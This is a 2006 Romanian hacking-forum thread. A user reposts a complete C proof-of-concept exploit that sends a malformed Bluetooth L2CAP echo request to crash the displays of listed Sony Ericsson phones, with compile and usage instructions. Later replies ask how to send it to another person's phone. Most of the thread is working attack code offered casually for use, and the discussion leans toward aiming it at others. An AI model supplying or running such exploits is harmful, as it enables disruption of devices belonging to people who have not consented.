phantomas Posted August 6, 2006 Report Posted August 6, 2006 LOL !!! ( luat de pe milworm ) /* Sony/Ericsson reset display - PoC *//* Pierre BETOUIN - [email][/email] *//* 05-02-2006 *//* Vulnerability found using BSS fuzzer : *//* Download [url][/url] *//* *//* Causes anormal behaviours on some Sony/Ericsson *//* cell phones *//* Vulnerable tested devices : *//* - K600i *//* - V600i *//* - K750i *//* - W800i *//* - And maybe other ones... *//* *//* Vulnerable devices will slowly turn their screen into *//* black and then display a white screen. *//* After a short period (~45sec), they will go back to *//* their normal behaviour *//* *//* gcc -lbluetooth reset_display_sonyericsson.c *//* -o reset_display_sonyericsson *//* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/socket.h>#include <bluetooth/bluetooth.h>#include <bluetooth/hci.h>#include <bluetooth/l2cap.h>#define SIZE 4#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)int main(int argc, char **argv){char *buffer;l2cap_cmd_hdr *cmd;struct sockaddr_l2 addr;int sock, sent, i;if(argc < 2){fprintf(stderr, "%s <btaddr>n", argv[0]);exit(EXIT_FAILURE);}if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0){perror("socket");exit(EXIT_FAILURE);}memset(&addr, 0, sizeof(addr));addr.l2_family = AF_BLUETOOTH;if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0){perror("bind");exit(EXIT_FAILURE);}str2ba(argv[1], &addr.l2_bdaddr);if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0){perror("connect");exit(EXIT_FAILURE);}if(!(buffer = (char *) malloc ((int) SIZE + 1))){perror("malloc");exit(EXIT_FAILURE);}memset(buffer, 90, SIZE);cmd = (l2cap_cmd_hdr *) buffer;cmd->code = L2CAP_ECHO_REQ;cmd->ident = 1;cmd->len = FAKE_SIZE;if( (sent=send(sock, buffer, SIZE, 0)) >= 0){printf("L2CAP packet sent (%d)n", sent);}printf("Buffer:t");for(i=0; i<sent; i++)printf("%.2X ", (unsigned char) buffer[i]);printf("n");free(buffer);close(sock);return EXIT_SUCCESS;}// [2006-02-06]sper sa fie de folos Quote
SpLo1T Posted August 8, 2006 Report Posted August 8, 2006 phantomas: mareste distanta de transmisie a datelor ? Quote
phantomas Posted August 8, 2006 Author Report Posted August 8, 2006 e exploit man ( ce nu intelegi ? ) distruge display prin bluetooth ( nu lam incercat dar mi se pare inresant ) Quote
SpLo1T Posted August 11, 2006 Report Posted August 11, 2006 ma..deci cum il trimit aluia prin bluetooth ? Quote